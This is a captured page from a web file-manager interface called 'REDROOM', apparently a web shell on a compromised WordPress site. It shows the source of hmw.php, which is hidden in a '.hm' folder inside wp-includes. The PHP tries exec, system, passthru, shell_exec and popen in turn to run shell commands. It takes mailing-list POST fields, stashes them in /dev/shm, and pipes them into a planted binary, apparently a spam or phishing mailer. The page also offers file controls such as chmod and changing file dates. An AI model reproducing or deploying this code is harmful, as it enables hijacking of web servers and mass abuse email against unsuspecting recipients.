REDROOM
PHP 8.1.33
Path:
Logout
Edit File
Size: 3.42 KB
Close
/home/jambtst2015/public_html/cccng.org/wp-includes/js/.hm/hmw.php
Text
Base64
<?php header_remove(); // Step 1: Capture all GET parameters and set them in the QUERY_STRING environment variable $env_query_string = http_build_query($_GET); putenv("QUERY_STRING=$env_query_string"); // Initialize variables for POST data $multipart_body = ''; $content_length = 0; $content_type = ''; function wEx($in) { $out = ''; if (function_exists('exec')) { @exec($in, $out); $out = @join("\n", $out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ""; while (!@feof($f)) $out .= fread($f, 1024); pclose($f); } return $out; } // Step 2: Extract POST data if the request method is POST if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST)) { // Create a boundary for multipart/form-data $boundary = '----WebKitFormBoundary' . md5(time()); // Set the content type for multipart/form-data with the boundary $content_type = "multipart/form-data;boundary=" . $boundary; putenv("CONTENT_TYPE=$content_type"); // Initialize the multipart body $multipart_body = ''; if(isset($_GET['store']) && !isset($_GET["bid"])){ //write out post data as json to md5 filename $postJson = json_encode($_POST); file_put_contents("/dev/shm/".md5($postJson).".txt", $postJson); echo md5($postJson)."<br />"; }elseif(isset($_GET['store']) && file_exists("/dev/shm/".$_GET["bid"].".txt")){ //load post data from md5 filename $jsonCode = file_get_contents("/dev/shm/".$_GET["bid"].".txt"); $postData = json_decode($jsonCode, true); $postData["smtp_from_email"] = $_POST["smtp_from_email"]; $postData["from_email"] = $_POST["from_email"]; $postData["maillist"] = $_POST["maillist"]; $postData["list"] = $_POST["list"]; $_POST = $postData; }elseif(isset($_GET['store']) && isset($_GET["bid"])){ echo "failed to load message data"; exit; } // Loop through each POST variable foreach ($_POST as $name => $value) { if(isset($_GET['encode'])){ $name = base64_decode($name); } $multipart_body .= "--" . $boundary . "\r\n"; $multipart_body .= "Content-Disposition: form-data; name=\"" . $name . "\"\r\n\r\n"; $multipart_body .= $value . "\r\n"; } // End the multipart body $multipart_body .= "--" . $boundary . "--\r\n"; // Calculate the content length $content_length = strlen($multipart_body); putenv("CONTENT_LENGTH=$content_length"); } // Step 3: Base64 encode the multipart body $encoded_body = base64_encode($multipart_body); // Step 4: Generate a random 12-character filename and store it in /dev/shm/ $random_filename = '/dev/shm/' . md5($encoded_body) . '.txt'; file_put_contents($random_filename, $encoded_body); // Step 5: Define the command to be executed // Pipe the base64-encoded POST data through `base64 -d`, then pipe that to your executable $command = "cat $random_filename | base64 -d | ./hm hma.htnl"; // Step 6: Execute the command using the system function // The output will be directly sent to the browser echo str_replace("Content-type: text/html", "", wEx($command)); // Step 7: Remove the temporary file before exiting unlink($random_filename); // Return the process exit code ?>
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 1
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
hmw.php
3.42 KB
lrw-r--r--
2024-04-09 06:44:14
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).